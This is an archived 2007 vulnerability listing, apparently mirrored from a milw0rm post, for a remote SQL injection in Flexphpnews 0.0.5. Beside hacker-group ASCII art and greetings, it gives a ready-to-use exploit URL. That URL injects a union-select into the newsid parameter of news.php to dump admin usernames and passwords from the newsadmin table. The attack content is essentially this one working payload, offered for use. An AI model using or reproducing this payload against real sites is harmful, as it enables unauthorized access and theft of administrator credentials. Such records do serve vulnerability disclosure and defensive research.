Flexphpnews 0.0.5 (news.php newsid) Remote SQL Injection Vulnerability

2007-04-05T00:00:00
ID SECURITYVULNS:DOC:16592
Type securityvulns
Reporter Securityvulns
Modified 2007-04-05T00:00:00

Description

                                                      .-""""""""-.                                 
                                                     /   Dj7xpl   \                              
                                                    |              |                                
                                                    |,  .-.  .-.  ,|                                
                                                    | )(_o/  \o_)( |                                     
                                                    |/     /\     \|                                 
                                          (@_       (_     ^^     _)                  
                                     _     ) \_______\__|IIIIII|__/_______________________________
                                    (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                           )_/        \          / 
                                           (@

+_______Iranian Are The Best In World_______+ [~] Portal.......: Flexphpnews version 0.0.5 [~] Download.....: http://www.china-on-site.com/flexphpsite/other.php [~] Author.......: Dj7xpl | Dj7xpl@yahoo.com [~] Class........: Remote SQL Injection Vulnerability * +_________________+

+_________________+ [~] Exploit......: http://[Taget]/[Path]/news.php?newsid=999+union+select+0,username,password+from+newsadmin +_________________+

+_________________+ [~] Sp Tnx.......: Milw0rm, Ashiyane, Delta Hacking, Virangar, Hackerz.ir, Shabgard.org, Simorgh ......... +_________________+

milw0rm.com [2007-04-01]